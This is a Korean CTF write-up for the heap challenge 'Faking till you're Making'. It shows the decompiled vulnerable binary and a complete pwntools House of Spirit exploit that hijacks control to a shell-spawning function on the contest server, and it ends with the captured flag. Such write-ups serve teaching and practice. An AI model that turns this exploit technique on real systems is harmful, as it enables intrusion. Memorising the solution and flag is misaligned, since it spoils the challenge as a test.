[0x41414141 CTF] Faking till you're Making (CTF/WRITEUP, 2021. 2. 2. 19:42)
Disassembly 디스어셈블리
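#!/bin/bash
# main.sh: run the proof-of-work binary first; start the challenge binary
# only when it exits 0 (checked directly instead of via $? so the status
# cannot be clobbered by an intervening command).
# Paths are quoted so a working directory containing spaces still resolves
# to one argument; the original backtick form would word-split.
if "$(pwd)/PoW"; then
    # Kept as written: bash's builtin echo prints "\n" literally unless
    # xpg_echo is enabled, so this is a separator line, not a blank line.
    echo "\n"
    "$(pwd)/vuln"
fi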
main.sh는 PoW 이후 vuln을 실행한다.
/* Ghidra decompilation of the challenge binary's main().
 *
 * Three memory-safety defects are visible in this listing alone:
 *   1. read() accepts up to 0x50 bytes into `buf`, a single pointer-sized
 *      local, so the input overruns it (presumably into the neighbouring
 *      stack variables declared below it).
 *   2. free() is handed `auStack88`, a stack array rather than a heap
 *      allocation — this is the primitive the writeup's "House of Spirit"
 *      heading refers to.
 *   3. fgets() may read up to 0x403 bytes into a 0x30-byte malloc() result,
 *      a heap overflow.
 * Returns 0 unconditionally.
 */
undefined8 main(void)
{
    void *buf;
    undefined auStack88 [64];
    char *s;
    void *ptr;

    setvbuf(_reloc.stdout, 0, 2, 0);   /* mode 2 == _IONBF: stdout unbuffered */
    printf(0x200c, sh);                /* format string at 0x200c not shown; the writeup says this prints sh's address */
    malloc(1);                         /* NOTE(review): result unused; presumably only initialises the allocator */
    read(0, &buf, 0x50);               /* 0x50 bytes into a pointer-sized local */
    ptr = auStack88;
    free(ptr);                         /* frees a stack address, not a heap chunk */
    s = (char *)malloc(0x30);
    fgets(s, 0x404, _reloc.stdin);     /* size argument 0x404 exceeds the 0x30-byte allocation */
    return 0;
}
vuln은 함수 sh의 주소를 출력하고, 스택 영역의 주소를 free한 뒤 malloc으로 할당된 메모리에 fgets로 0x404 바이트 만큼 입력받는다.
/* Spawns a shell. Nothing in main() calls it — main() only passes its
 * address to printf() — so it exists purely as the exploit target whose
 * address the binary leaks. */
void sh(void)
{
    system("/bin/sh");
    return;
}
보호기법으로는 NX와 PIE가 걸려 있다.
House of Spirit
Code
from pwn import *
from hashlib import sha256
from itertools import product
from string import ascii_lowercase
from tqdm import tqdm


def PoW():
    """Answer the server's proof-of-work prompt.

    The last six characters of the first received line are the target.
    Every four-letter lowercase string is tried until the hex sha256 of
    one ends with the target; that string is sent and the acknowledgement
    line consumed. Uses the module-level connection ``p``.
    """
    target = p.recvline().strip()[-6:].decode()
    for letters in tqdm(product(ascii_lowercase, repeat=4)):
        candidate = "".join(letters)
        digest = sha256(candidate.encode()).hexdigest()
        if digest[-6:] == target:
            log.info("key : " + candidate)
            p.sendline(candidate)
            p.recvline()
            break


binary = "./vuln"
lib = "./libc-2.32.so"
server = "185.172.165.118"
port = 2929
REMOTE = True

# context.log_level = 'debug'
context.binary = binary

if REMOTE:
    p = remote(server, port)
    PoW()
else:
    p = process(binary)
    gdb.attach(p)

e = ELF(binary)
r = ROP(e)
l = ELF(lib)
e.checksec()


def send_payload(payload):
    """Log a payload and send it as one line over ``p``."""
    log.info("payload = %s" % repr(payload))
    p.sendline(payload)


f = FmtStr(send_payload, offset=1)

# The binary prints the address of sh() first (14 characters, "0x" + 12 hex).
sh = int(p.recv(14), 16)
log.info("sh : " + hex(sh))

# First input: consumed by read() into the stack; laid out as a fake chunk
# header (size 0x40, then 0x30) ahead of the stack address that main() frees.
fake_chunk = p64(0) + p64(0x40) + p64(0) * 7 + p64(0x30)
p.send(fake_chunk)

# Second input: consumed by fgets(); 0x58 bytes of padding followed by the
# leaked address of sh().
overflow = b"\x90" * 0x58 + p64(sh)
p.sendline(overflow)

p.interactive()
Flag
flag{seems_h0us3_0f_sp1r1ts_w0rks_0n_2.32_then_58493}